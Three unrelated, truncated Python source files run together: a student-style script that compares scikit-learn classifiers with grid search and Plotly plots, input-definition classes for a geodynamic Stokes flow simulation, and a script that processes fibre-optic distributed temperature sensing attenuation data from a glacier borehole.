Plot the input dataset as a scatter plot, showing the two classes with two different patterns.
- source_file: csv file with the input samples
- weights: from perceptron_classify function
- names_in: a list of the names of the columns (headers) in the input df
returns:
- a plot of the figure in the default browser, and
- a PNG version of the plot to the "images" project directory
"""
# Create the figure for plotting the initial data
fig = go.Figure(data=go.Scatter(x=df[names_in[0]],
y=df[names_in[1]],
mode='markers',
marker=dict(
color=df[names_in[2]],
colorscale='Viridis',
line_width=1,
size = 16),
text=df[names_in[2]], # hover text goes here
showlegend=False)) # turn off legend only for this item
## Create the 1D array for X values from the first feature; this is just to be able to plot a line
## within the space defined by the two features explored
#X = np.linspace(0, max(df[names_in[0]].max(),df[names_in[1]].max()))
## Vector Y will calculated from the weights, w1, w2, the bias, b, and the value of X in its 1D linear space
#Y = []
#for b, w1, w2 in [weights]: #(matrix.tolist()[0] for matrix in weights):
# for x in X:
# if w2 == 0:
# y = 0.0
# else:
# y = (-(b / w2) / (b / w1))* x + (-b / w2) # per the equation of a line, e.g. C = Ax + By
# Y.append(y)
## Add the threshold line to the plot
#fig.add_trace(go.Scatter(x=X, y=Y,
# mode= 'lines',
# name = 'Threshold'))
# Give the figure a title
fig.update_layout(title='Perceptron Algorithm | Classification with support vector classifiers | Problem 3')
# Show the figure, by default will open a browser window
fig.show()
# export plot to png file to images directory
# create an images directory if not already present
if not os.path.exists("images"):
os.mkdir("images")
## write the png file with the plot/figure
return fig.write_image("images/fig3.png")
def plot_model(X, y, xx, y_, Z, model_type:str):
"""
Plot the decision boundary from:
- X: the features dataset,
- y: the labels vector,
- h: step size in the mesh, e.g. 0.02
- grid_search: model of the grid_search already fitted
- model_type: str of the type of model used for title of plot and filename of image to export
returns:
- a plot of the figure in the default browser, and
- a PNG version of the plot to the "images" project directory
"""
# Create the figure for plotting the model
fig = go.Figure(data=go.Scatter(x=X[:, 0], y=X[:, 1],
mode='markers',
showlegend=False,
marker=dict(size=10,
color=y,
colorscale='Jet',
line=dict(color='black', width=1))
))
# Add the heatmap to the plot
fig.add_trace(go.Heatmap(x=xx[0], y=y_, z=Z,
colorscale='Jet',
showscale=False))
# Give the figure a title and name the x,y axis as well
fig.update_layout(
title='Perceptron Algorithm | Classification with support vector classifiers | ' + model_type.upper(),
xaxis_title='True Values',
yaxis_title='Predicted Values')
# Show the figure, by default will open a browser window
fig.show()
# export plot to png file to images directory
# create an images directory if not already present
if not os.path.exists("images"):
os.mkdir("images")
## write the png file with the plot/figure
return fig.write_image("images/fig3-" + model_type + ".png")
def train_split(df, test_percentage:float = 0.40):
# only define test_percentage,
# by default train_percentage = (1 - test_percentage)
# our X matrix will be the first two cols of the dataframe: 'A' and 'B'
X = df[df.columns[0:2]].values
# our y vector will be the third col of the dataframe: 'label'
y = df['label']
# create training and testing vars
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_percentage, stratify = y)
print (X_train.shape, y_train.shape)
print (X_test.shape, y_test.shape)
return X, y, X_train, X_test, y_train, y_test
def apply_CSVC(X, y, X_train, X_test, y_train, y_test, model_type:str, k: int, kernel_type:str, parameters:dict):
if model_type == 'logistic':
logistic = linear_model.LogisticRegression()
start = parameters['C'][0]
stop = parameters['C'][-1]
num = len(parameters['C'])
C = np.logspace(start, stop, num)
penalty = ['l2']
hyperparameters = dict(C=C, penalty=penalty)
grid_search = GridSearchCV(logistic, hyperparameters, cv = k, verbose = 0)
if model_type == 'knn':
grid_params = parameters
grid_search = GridSearchCV(KNeighborsClassifier(), grid_params, cv = k, verbose = 0)
if model_type == 'decision_tree':
grid_search = GridSearchCV(DecisionTreeClassifier(random_state=42), parameters, verbose=1, cv=3)
if model_type == 'random_forest':
grid_search = GridSearchCV(RandomForestRegressor(random_state=42), parameters, verbose=1, cv=3)
if model_type == 'none':
svc = svm.SVC()
# specify cv as integer for number of folds in (stratified)KFold,
# cv set to perform 5-fold cross validation, although 'None' already uses the default 5-fold cross validation
grid_search = GridSearchCV(svc, parameters, cv = k)
grid_search.fit(X, y) # fit the model #TODO: clarify if fit shall be done on train datasets or on complete set
#get results best and test
best_score = grid_search.best_score_
predictions = grid_search.predict(X_test)
test_score = grid_search.score(X_test, y_test)
#print results
print("Best parameters for", kernel_type.upper(), "are:", clf.best_params_, sep=' ')
print("Best score for", kernel_type.upper(), "is:", clf.best_score_, sep=' ')
print("Test score for", kernel_type.upper(), "is:", test_score, sep=' ')
# let's plot the model
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
h = .02 # step size in the mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max, h)
, np.arange(y_min, y_max, h))
y_ = np.arange(y_min, y_max, h)
Z = grid_search.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
#print(Z)
#Z = Z.reshape((xx.shape[0], xx.shape[1], 3))
plot_model(X, y, xx, y_, Z, model_type)
return best_score, test_score
def write_csv(filename, a, b, c):
# write the outputs csv file
filepath = os.path.join(os.getcwd(),'datasets','out', filename)
df_a = pd.DataFrame(a)
df_b = pd.DataFrame(b)
df_c = pd.DataFrame(c)
df = pd.concat([df_a, df_b, df_c], axis = 1, ignore_index = True)
#dataframe = df.rename(columns={0:'alpha',1:'number_of_iterations',2:'b_0', 3:'b_age',4:'b_weight'})
df.to_csv(filepath, index = False, header = False)
return print("New Outputs file saved to: <<", filename, ">>", sep='', end='\n')
def main():
"""
## $ python3 problem3.py input3.csv output3.csv
"""
#take string for input data csv file
#in_data = str(sys.argv[1])
in_data = 'input3.csv'
#take string for output data csv file
#out_data = str(sys.argv[2])
out_data = 'output3.csv'
df = get_data(in_data)
plot_inputs(df)
X, y, X_train, X_test, y_train, y_test = train_split(df)
best_score_linear, test_score_linear = apply_CSVC(X, y, X_train, X_test, y_train, y_test, model_type = 'none', k = 5, kernel_type = 'svm_linear', parameters = {'kernel':('linear', 'linear'), 'C':[0.1, 0.5, 1, 5, 10, 50, 100]})
best_score_poly, test_score_poly = apply_CSVC(X, y, X_train, X_test, y_train, y_test, model_type = 'none', k = 5, kernel_type = 'svm_polynomial', parameters = {'kernel':('poly', 'poly'), 'gamma':[0.1, 0.5], 'C':[0.1, 1, 3], 'degree':[4, 5, 6]})
best_score_rbf, test_score_rbf = apply_CSVC(X, y, X_train, X_test, y_train, y_test, model_type = 'none', k = 5, kernel_type = 'svm_rbf', parameters = {'kernel':('rbf', 'rbf'), 'gamma':[0.1, 0.5, 1, 3, 6, 10], 'C':[0.1, 0.5, 1, 5, 10, 50, 100]})
best_score_log, test_score_log = apply_CSVC(X, y, X_train, X_test, y_train, y_test, model_type = 'logistic', k = 5, kernel_type = 'logistic', parameters = {'C':[0.1, 0.5, 1, 5, 10, 50, 100]})
best_score_knn, test_score_knn = apply_CSVC(X, y, X_train, X_test, y_train, y_test, model_type = 'knn', k = 5, kernel_type = 'knn', parameters = {'n_neighbors': np.arange(1,51,1),'leaf_size': np.arange(5,61,5)})
best_score_dt, test_score_dt = apply_CSVC(X, y, X_train, X_test, y_train, y_test, model_type = 'decision_tree', k = 5, kernel_type = 'decision_tree', parameters = {'max_depth': np.arange(1,51,1),'min_samples_split': np.arange(2,11,1)})
best_score_rf, test_score_rf = apply_CSVC(X, y, X_train, X_test, y_train, y_test, model_type = 'random_forest', k = 5, kernel_type = 'random_forest', parameters = {'max_depth': np.arange(1,51,1),'min_samples_split': np.arange(2,11,1)})
a = ['svm_linear', 'svm_polynomial', 'svm_rbf', 'logistic', 'knn', | |
<filename>src/UserInput/InputDef.py
# ============================================
#
# Classes of User Input
#
# <NAME>, June 3, 2016
#
# ============================================
from math import pi, cos, sin, tan, pow
import gc
import json
import copy
import os
class Frozen(object): # A metaclass that prevents the creation of new attributes
__List = []
def __setattr__(self, key, value):
setIsOK = False
for item in self.__List:
if key == item:
setIsOK = True
if setIsOK == True:
object.__setattr__(self, key, value)
else:
raise TypeError( "%r has no attributes %r" % (self, key) )
def setFromDict(self, dictionary):
"""Constructor"""
for key in dictionary:
setattr(self, key, dictionary[key])
from MaterialsDef import Material
class Setup(Frozen):
_Frozen__List = ["Description","Physics","Grid","Numerics","Particles","Char","Visu","BC","IC","Geometry","MatProps","Output"]
def __init__(self,isDimensional=False):
self.Description = ""
self.Physics = Physics(isDimensional)
self.Grid = Grid()
self.Numerics = Numerics()
self.Particles = Particles()
self.Char = Char()
self.Visu = Visu()
self.BC = BC()
self.IC = IC()
self.Geometry = {}
self.MatProps = {}
self.Output = Output()
class Grid(Frozen):
_Frozen__List = ["xmin","xmax","ymin","ymax","nxC","nyC","fixedBox"]
def __init__(self):
self.xmin = -.5
self.xmax = .5
self.ymin = -.5
self.ymax = .5
self.nxC = 64
self.nyC = 64
#self.ySeg = self.xmin
#self.ySeg = self.xmin
self.fixedBox = False
class Numerics(Frozen):
_Frozen__List = ["nTimeSteps", "maxTime", "nLineSearch", "maxNonLinearIter", "minNonLinearIter", "relativeTolerance", "absoluteTolerance","maxCorrection","CFL_fac_Stokes","CFL_fac_Thermal","CFL_fac_Darcy","etaMin","etaMax","phiMin","phiMax","phiCrit","dtMin","dtMax","use_dtMaxwellLimit","stickyAirSwitchingDepth","stickyAirSwitchPhaseTo","stickyAirSwitchPassiveTo","stickyAirTimeSwitchPassive","dtAlphaCorr","dtVep","dtMaxwellFac_EP_ov_E","dtMaxwellFac_VP_ov_E","dtMaxwellFac_VP_ov_EP","dt_stressFac","deltaSigmaMin","dt_plasticFac","yieldComputationType", "invariantComputationType","stressSubGridDiffFac","dtIni"]
def __init__(self):
self.nTimeSteps = 1 # negative value for infinite
self.maxTime = 14*1e9*(3600*24*365) # in s, by default 14Gyrs
self.nLineSearch = 1
self.maxNonLinearIter = 1 # should always be greater than the number of line searches
self.minNonLinearIter = 1 # should always be greater than the number of line searches
self.relativeTolerance = 1E-18 # relative tolerance to the one of this time step
self.absoluteTolerance = 1E-6 # relative tolerance to the first one of the simulation
self.maxCorrection = 1.0
self.CFL_fac_Stokes = 0.75
self.CFL_fac_Thermal = 10.0
self.CFL_fac_Darcy = 0.5
self.use_dtMaxwellLimit = True
self.etaMin = 1e-8
self.etaMax = 1e8
self.phiMin = 1e-5
self.phiMax = 0.8
self.phiCrit = 1e-4
self.dtMin = 0.
self.dtMax = 1e100
self.stickyAirSwitchingDepth = -1e100; # effectively switched off by default
self.stickyAirSwitchPhaseTo = 0
self.stickyAirSwitchPassiveTo = 0
self.stickyAirTimeSwitchPassive = 1e100
self.dtAlphaCorr = 1.0 # correction factor for the time step size (0<alpha<=1)
self.dtVep = 0.0 # if value is 0 then use dtAdv for the computation, otherwise use the value given
self.dtMaxwellFac_EP_ov_E = 0.0; # lowest, ElastoPlasticVisc / G
self.dtMaxwellFac_VP_ov_E = 0.5; # intermediate, ViscoPlasticVisc / G
self.dtMaxwellFac_VP_ov_EP = 0.5; # highest, ViscoPlasticVisc / ElastoPlasticStress
self.dt_stressFac = 1.0;
self.dt_plasticFac = 0.5 # between 0 and 1; 0 = EP/E limit; 1 = VP/EP limit
self.deltaSigmaMin = 0.0 * 1e6; # 5 MPa by default
self.yieldComputationType = 1 # 0: Cell-and-Node, 1:Cell-interp2Node, 2: Markers
self.invariantComputationType = 1 # 0: (interp)^2, 1: interp(^2)
self.stressSubGridDiffFac = 1.0
self.dtIni = -1.0 # Default Dummy, in the function write_inputfile it is assigned to the value of Char.time if the dummy value has not been overwritten
class Particles(Frozen):
_Frozen__List = ["nPCX","nPCY","noiseFactor","minPartPerCellFactor","maxPartPerCellFactor","passiveGeom","passiveDx","passiveDy"]
def __init__(self):
self.nPCX = 4
self.nPCY = 4
self.noiseFactor = 0.0
self.minPartPerCellFactor = 0.2
self.maxPartPerCellFactor = 3.0
self.passiveGeom = "Grid"
self.passiveDx = 1.0
self.passiveDy = 1.0
class Physics(Frozen):
_Frozen__List = ["Cp","gx","gy","eta_f","rho_f","y_oceanSurface","Pback"]
def __init__(self,Dimensional):
if Dimensional == True:
self.Cp = 1000.0
self.gx = 0.0
self.gy = -9.81
self.eta_f = 100.0
self.rho_f = 1000.0
self.y_oceanSurface = 0.0
self.Pback = 0.0
else:
self.Cp = 1000.0
self.gx = 0.0
self.gy = -1.0
self.eta_f = 0.0001
self.rho_f = 0.3
self.y_oceanSurface = 0.0
self.Pback = 0.0
class SingleColorMap(Frozen):
_Frozen__List = ["type","colorMap","scale","center","max","log10on","A0number","colorMapRes","alphaAbsThreshold"]
def __init__(self,colormapType="Manual",colormap="Default",scale=1.0,center=0.0,maxValue=1.0,log10on=False,number=0,alphaAbsThreshold=-1.0):
self.A0number = number
self.type = colormapType # "automatic would go from min to max values"
self.colorMapRes= 0
self.colorMap = colormap
self.scale = scale
self.center = center # centered value (scaled)
self.max = maxValue # maximum value (scaled)
self.log10on = log10on
self.alphaAbsThreshold = alphaAbsThreshold # absolute value of the threshold for transparecny (not affected by log10on), negative values effectively put it off
if (self.center>self.max):
raise ValueError( "%r has a max value lower than its center value (%.2e < %.2e)" % (self, self.max,self.center) )
class ColorMapList(Frozen):
_Frozen__List = ["Viscosity","Khi","Khib","StrainRate","Stress","Velocity","VelocityDiv","SIIOvYield","PeOvYield","Pressure","Density","Temperature",
"FluidPressure","CompactionPressure","Permeability","Porosity","Phase","VxRes","VyRes","PRes","PfRes","PcRes","TRes","Strain","Vorticity","POvPlitho",
"EffectiveViscosity", "ShearModulus","ExtraField"]
def __init__(self):
self.Viscosity = SingleColorMap(log10on=True, number= 1)
self.StrainRate = SingleColorMap(log10on=True, number= 2)
self.Velocity = SingleColorMap( number= 3)
self.Pressure = SingleColorMap( number= 4)
self.Density = SingleColorMap( number= 5)
self.Temperature = SingleColorMap( number= 6)
self.Stress = SingleColorMap( number= 7)
self.FluidPressure = SingleColorMap( number= 8)
self.Permeability = SingleColorMap(log10on=True, number= 9)
self.Porosity = SingleColorMap( number=10)
self.CompactionPressure = SingleColorMap( number=11)
self.Phase = SingleColorMap( number=12)
self.VxRes = SingleColorMap(log10on=True, number=13, scale=1e-6, maxValue=2.0)
self.VyRes = SingleColorMap(log10on=True, number=14, scale=1e-6, maxValue=2.0)
self.PRes = SingleColorMap(log10on=True, number=15, scale=1e-6, maxValue=2.0)
self.PfRes = SingleColorMap(log10on=True, number=16, scale=1e-6, maxValue=2.0)
self.PcRes = SingleColorMap(log10on=True, number=17, scale=1e-6, maxValue=2.0)
self.TRes = SingleColorMap(log10on=True, number=18, scale=1e-6, maxValue=2.0)
self.VelocityDiv = SingleColorMap( number=19, scale=1e-6, maxValue=2.0)
self.SIIOvYield = SingleColorMap( number=20, maxValue=1.5, center=1.0)
self.PeOvYield = SingleColorMap( number=21, maxValue=1.5, center=1.0)
self.Khi = SingleColorMap(log10on=True, number=22)
self.Khib = SingleColorMap(log10on=True, number=23)
self.Strain = SingleColorMap( number=24)
self.Vorticity = SingleColorMap( number=25)
self.POvPlitho = SingleColorMap( number=26, scale=1.0 , maxValue=2.0, center=1.0)
self.EffectiveViscosity = SingleColorMap(log10on=True, number=27)
self.ShearModulus = SingleColorMap(log10on=True, number=28)
self.ExtraField = SingleColorMap( number=29)
class Visu(Frozen):
_Frozen__List = ["type","typeParticles","showParticles","shiftFacX","shiftFacY","shiftFacZ","writeImages","transparency","alphaOnValue","showGlyphs","glyphType","glyphMeshType","glyphScale","glyphSamplingRateX","glyphSamplingRateY","width","height","outputFolder","retinaScale","particleMeshRes","particleMeshSize","filter","colorMap","typeNumber","shaderFolder","renderFrequency", "renderTimeFrequency","closeAtTheEndOfSimulation"]
def __init__(self):
self.type = "StrainRate" # Default
self.typeNumber = 0
self.typeParticles = "PartPhase" # Default
self.showParticles = True
self.shiftFacX = 0.00
self.shiftFacY = 0.00
self.shiftFacZ = -0.05
self.writeImages = False
self.transparency = False
self.alphaOnValue = False
self.showGlyphs = False
self.glyphType = "StokesVelocity"
self.glyphMeshType = "ThinArrow"
self.glyphScale = 0.05
self.glyphSamplingRateX = 3
self.glyphSamplingRateY = 6
self.width = 1024
self.height = 1024
self.outputFolder = "../../OutputStokesFD"
self.shaderFolder = "../Shaders/Default" # Relative path from the running folder (of StokesFD)
self.renderFrequency = 1 # Render every this number of steps
self.renderTimeFrequency = 0 # Render every this amount of time, if 0: then renderFrequency is used instead
self.retinaScale = 2
self.particleMeshRes = 6 # minimum 3, higher number make the particle voronoi diagram look smoother
self.particleMeshSize = 0.05
self.filter = "Linear"
self.colorMap = ColorMapList()
self.closeAtTheEndOfSimulation = True
def dictionarize(self):
self.colorMap = vars(self.colorMap)
for key in self.colorMap:
self.colorMap[key] = vars(self.colorMap[key])
def finalize(self):
self.dictionarize()
ListOfTypes = ("Blank", "Viscosity", "StrainRate", "Velocity", "Pressure", "Density", "Temperature", "Stress", "FluidPressure", "Permeability", "Porosity", "CompactionPressure", "Phase",
"VxRes", "VyRes", "PRes", "PfRes", "PcRes", "TRes", "VelocityDiv","SIIOvYield", "PeOvYield", "Khi", "Khib","Strain","Vorticity","POvPlitho", "EffectiveViscosity", "ShearModulus", "ExtraField")
self.typeNumber = ListOfTypes.index(self.type)
#Here goes the automatic computation of colormapRes
class Char(Frozen):
_Frozen__List = ["length","mass","time","temperature"]
def __init__(self):
self.length = 1.0
self.mass = 1.0
self.time = 1.0
self.temperature = 1.0
def set_based_on_strainrate(self,PhaseRef,BCStokes,BCThermal,Grid):
self.time = abs(1.0/BCStokes.backStrainRate)
self.length = (Grid.xmax-Grid.xmin)/2
self.temperature = (BCThermal.TB + BCThermal.TT)/2.0
CharVisc = PhaseRef.getRefVisc(0,self.temperature,abs(BCStokes.backStrainRate))
CharStress = 2*CharVisc*abs(BCStokes.backStrainRate)
self.mass = CharStress*self.time*self.time*self.length
if (PhaseRef.isRef == False):
raise ValueError("PhaseRef.isRef == False")
def set_based_on_lithostatic_pressure(self,PhaseRef,BCStokes,BCThermal,Physics,Grid,Length=0):
if (Length == 0):
self.length = (Grid.ymax-Grid.ymin)/2.0
else:
self.length = Length
self.temperature = (BCThermal.TB + BCThermal.TT)/2.0
CharVisc = PhaseRef.getRefVisc(0,self.temperature,abs(BCStokes.backStrainRate))
CharStress = PhaseRef.rho0*abs(Physics.gy)*self.length
self.time = CharVisc/CharStress
self.mass = CharStress*self.time*self.time*self.length
if (PhaseRef.isRef == False):
raise ValueError("PhaseRef.isRef == False")
def set_based_on_corner_flow(self,PhaseRef,BCStokes,BCThermal,Physics,Grid,Length=0):
if (Length == 0):
self.length = (Grid.ymax-Grid.ymin)/2.0
else:
self.length = Length
self.temperature = (BCThermal.TB + BCThermal.TT)/2.0
CharVisc = PhaseRef.getRefVisc(0,self.temperature,abs(BCStokes.backStrainRate))
CharStress = CharVisc*BCStokes.refValue/self.length;
self.time = CharVisc/CharStress
self.mass = CharStress*self.time*self.time*self.length
if (PhaseRef.isRef == False):
raise ValueError("PhaseRef.isRef == False")
class CharExtra(Frozen):
_Frozen__List = ["visc","stress","strainrate"]
def __init__(self,Char):
kg = Char.mass
m = Char.length
s = Char.time
#K = Char.temperature
self.visc = kg/m/s
self.stress = kg/m/s/s
self.strainrate = 1/s
class BC(Frozen):
_Frozen__List = ["Stokes","Thermal"]
def __init__(self):
self.Stokes = BCStokes()
self.Thermal = BCThermal()
class BCStokes(Frozen):
_Frozen__List = ["backStrainRate","SetupType","refValue","DeltaL","Sandbox_TopSeg00","Sandbox_TopSeg01","Sandbox_NoSlipWall","Corner_SubductionAngle",
"Bottom_frictionAngle","Bottom_cohesion","Bottom_staticPfFac","Bottom_type",
"instantErosion_xL", "instantErosion_yL", "instantErosion_xR", "instantErosion_yR", "instantErosion_use"]
def __init__(self):
self.backStrainRate = -1.0
self.SetupType = "PureShear"
self.refValue = 1.0
self.DeltaL = 1.0
self.Sandbox_TopSeg00 = 0.0
self.Sandbox_TopSeg01 = 0.0
self.Sandbox_NoSlipWall = False
self.Corner_SubductionAngle = 30.0/180.0*pi
self.Bottom_frictionAngle = 30.0/180.0*pi
self.Bottom_cohesion = 0.0
self.Bottom_staticPfFac = 0.0
self.Bottom_type = "inactive" # values can be: "inactive", "fixed", "weakenable"
# self.instantErosion_xL = 0.0
# self.instantErosion_yL = 0.0
# self.instantErosion_xR = 0.0
# self.instantErosion_yR = 0.0
# self.instantErosion_use = False
class BCThermal(Frozen):
_Frozen__List = ["TT","TB","SetupType","refValue","DeltaL"]
def __init__(self):
self.TT = 1.0
self.TB = 1.0
self.SetupType = "TT_TB_LRNoFlux"
self.refValue = 1.0
self.DeltaL = 1.0
class BCDarcy(Frozen):
_Frozen__List = ["backStrainRate","SetupType","refValue","DeltaL"]
def __init__(self):
self.PfT_type = "Dirichlet"
self.PfT_val = 0.0
self.PfB_type = "Dirichlet"
self.PfB_val = 0.0
self.PfL_type = "Neumann"
self.PfL_val = 0.0
self.PfR_type = | |
<gh_stars>0
#script to process cumulative attenuation DataSet from FO_diff_attenuation.py
#<NAME>, Scott Polar Research Institute, University of Cambridge, 2020. <EMAIL>
import os
import sys
import glob
import pickle
import datetime
import matplotlib
import numpy as np
import pandas as pd
import xarray as xr
import matplotlib.pyplot as plt
import matplotlib.patches as patch
from mpl_toolkits.axes_grid.inset_locator import inset_axes
#change working directory to the location of the python file
os.chdir(os.path.dirname(sys.argv[0]))
#inputs
#channel 1
bh_start = 220.#211.944 #(m) apex of T dip at start of borehole
bh_end = 2319.844#2327.9 #(m) apex of T dip at end of borehole (up)
ta_start = 1266. #(m) start of the turnaround (using apex)
ta_end = 1271.58 #(m) end of the turnaround (using apex) (up)
#channel 3
bh_start3 = bh_start #(m) apex of T dip at start of borehole
bh_end3 = bh_end #(m) apex of T dip at end of borehole (up)
ta_start3 = 1267.39 #(m) start of the turnaround (using apex)
ta_end3 = 1271.46 #(m) end of the turnaround (using apex) (up)
z_start = 204. #(m) borehole start depth
fail_depth = 1109.5 - z_start #(m) at which point did the cable fail?
file_loc = 'processed_data/DataSet_ST_data_ch1.nc'
file_loc3 = 'processed_data/DataSet_ST_data_ch3.nc'
t_start = datetime.datetime(2019, 7, 5)
t_end = datetime.datetime(2019, 8, 14, 1)
t1 = datetime.datetime(2019, 7, 9)
t2 = datetime.datetime(2019, 7, 19)
t3 = datetime.datetime(2019, 7, 29)
t4 = datetime.datetime(2019, 7, 8)
#load
ds = xr.open_dataset(file_loc)
ds3 = xr.open_dataset(file_loc3)
#take z and t slice
ds = ds.sel(z=slice(bh_start, bh_end))
ds = ds.sel(t = slice(t_start, t_end))
ds3 = ds3.sel(z=slice(bh_start, bh_end))
ds3 = ds3.sel(t = slice(t_start, t_end))
#calculate differential attenuation
a = 0.5*( np.log(ds['ST'].values[1::,:]/ds['AST'].values[1::,:]) - np.log(ds['ST'].values[0:-1,:]/ds['AST'].values[0:-1,:])
+ np.log(ds['RST'].values[0:-1,:]/ds['RAST'].values[0:-1,:]) - np.log(ds['RST'].values[1::,:]/ds['RAST'].values[1::,:]) )
a3 = 0.5*( np.log(ds3['ST'].values[1::,:]/ds3['AST'].values[1::,:]) - np.log(ds3['ST'].values[0:-1,:]/ds3['AST'].values[0:-1,:])
+ np.log(ds3['RST'].values[0:-1,:]/ds3['RAST'].values[0:-1,:]) - np.log(ds3['RST'].values[1::,:]/ds3['RAST'].values[1::,:]) )
#cumulative sum and concatenate
a_cum = np.cumsum(a,axis=0)
a_cum = np.concatenate((a_cum, np.ones((1,len(ds.t.values)))*a_cum[-1,:] ), axis = 0)
a_cum3 = np.cumsum(a3,axis=0)
a_cum3 = np.concatenate((a_cum3, np.ones((1,len(ds3.t.values)))*a_cum3[-1,:] ), axis = 0)
da = xr.DataArray( a_cum,
dims = ('z', 't'),
coords= { 'z': ds.z.values,
't': ds.t.values})
da3 = xr.DataArray( a_cum3,
dims = ('z', 't'),
coords= { 'z': ds3.z.values,
't': ds3.t.values})
#resample
da = da.resample(t='48H').mean()
da_down = da.sel(z = slice(bh_start, ta_start))
da3 = da3.resample(t='48H').mean()
da_down3 = da3.sel(z = slice(bh_start3, ta_start3))
#vertical reflection of lower half
da_up = da.sel(z = slice(ta_end, bh_end))
da_up.values = 0 - da_up.values
da_up3 = da3.sel(z = slice(ta_end3, bh_end3))
da_up3.values = 0 - da_up3.values
#horizontal reflection
da_up.z.values = max(da_up.z.values) - da_up.z.values
da_up3.z.values = max(da_up3.z.values) - da_up3.z.values
#horizontal shift
da_up.values = da_up.values[:] + (da_down.values[0,:] - da_up.values[-1,:])
da_up3.values = da_up3.values[:] + (da_down3.values[0,:] - da_up3.values[-1,:])
#vertical shift
da_up.z.values = da_up.z.values + (da_down.z.values[0] - da_up.z.values[-1])
da_up3.z.values = da_up3.z.values + (da_down3.z.values[0] - da_up3.z.values[-1])
#plots
# plt.plot(da_down.isel(t = -1), da_down.z, label='channel 1 down')
# plt.plot(da_up.isel(t = -1), da_up.z, label='channel 1 up')
# plt.plot(da_down3.isel(t = -1), da_down3.z, label='channel 3 down')
# plt.plot(da_up3.isel(t = -1), da_up3.z, label='channel 3 up')
# plt.legend()
# plt.gca().invert_yaxis()
# plt.show()
#plot inputs
#this entire plot has been altered for the revision suplementary figure. See v1-2 for working version to produce the bottom half of figure 2
bh_start = 204.
bh_depth = 1042.95 #(m) from <NAME> BH19c depth email thread
bh_depth_dts = 1062. #(m) BH19c depth from DTS with refractive index error
y_axis = (da_down.z - bh_start)*(bh_depth/bh_depth_dts)
fail_depth = fail_depth*(bh_depth/bh_depth_dts)
xlim1 = 0.045
xlim2 = 0.058
lw = 0.8
fs = 8
inset_h = 1.15 #(inch)
inset_w = 1.15
CTZ_upper = 959
CTZ_lower = 982 + 40 #(m) interpreted depth of bottom of the CTZ + 40 for good measure
LGIT = 889 -40 #(m) at which point did the cable fail, with - 40 for good measure
cu_top = 910
cu_bot = 925
up_an_top = 200
up_an_bot = 250
up_an_l = 0.0110
up_an_r = 0.0135
bot_an_top = 810
bot_an_bot = 1045
bot_an_l = 0.045
bot_an_r = 0.06
matplotlib.rcParams.update({'font.size': fs})
fig1, ax1 = plt.subplots(1, 5)
fig1.set_size_inches(7.3, 70/25.4)
fig1.subplots_adjust(wspace = 0.27)
fig1.subplots_adjust(hspace = 0.27)
ax1[0].plot(da_down.isel(t = 2), y_axis, label='channel 1 down', lw = lw, color='k')
ax1[0].invert_yaxis()
ax1[0].set_ylim([CTZ_lower, LGIT])
ax1[0].set_xlim([xlim1, xlim2])
ax1[0].grid(True)
ax1[0].set_ylabel('Depth (m)', fontsize=fs)
ax1[0].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[0].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[0].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
#date = pd.to_datetime(str(da.t.values[2]))
#date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
#ax1[0].text(0.051, 862, date_string, fontsize=fs)
ax1[1].plot(da_down.isel(t = 6), y_axis, label='channel 1 down', lw = lw, color='k')
ax1[1].invert_yaxis()
ax1[1].set_ylim([CTZ_lower, LGIT])
ax1[1].set_xlim([xlim1, xlim2])
ax1[1].grid(True)
ax1[1].set_yticklabels([])
ax1[1].scatter(0.0046, 105, color='orange')
ax1[1].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[1].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[1].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
date = pd.to_datetime(str(da.t.values[7]))
date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
print('date_7')
print(date_string)
#ax1[1].text(0.051, 862, date_string, fontsize=fs)
ax1[2].plot(da_down.isel(t = 10), y_axis, label='channel 1 down', lw = lw, color='k')
ax1[2].invert_yaxis()
ax1[2].set_ylim([CTZ_lower, LGIT])
ax1[2].set_xlim([xlim1, xlim2])
ax1[2].grid(True)
ax1[2].set_yticklabels([])
ax1[2].scatter(0.0046, 105, color='orange')
ax1[2].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[2].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[2].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
#date = pd.to_datetime(str(da.t.values[12]))
#date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
#ax1[2].text(0.051, 862, date_string, fontsize=fs)
ax1[3].plot(da_down.isel(t = 14), y_axis, label='channel 1 down', lw = lw, color='k')
ax1[3].invert_yaxis()
ax1[3].set_ylim([CTZ_lower, LGIT])
ax1[3].set_xlim([xlim1, xlim2])
ax1[3].grid(True)
ax1[3].set_yticklabels([])
ax1[3].scatter(0.0046, 105, color='orange')
ax1[3].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[3].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[3].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
date = pd.to_datetime(str(da.t.values[17]))
print('date_17')
print(da_down.t.values)
date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
#ax1[3].text(0.051, 862, date_string, fontsize=fs)
ax1[4].plot(da_down.isel(t = 18), y_axis, label='channel 1 down', lw = lw, color='k')
ax1[4].invert_yaxis()
ax1[4].set_ylim([CTZ_lower, LGIT])
ax1[4].set_xlim([xlim1, xlim2])
ax1[4].grid(True)
ax1[4].set_yticklabels([])
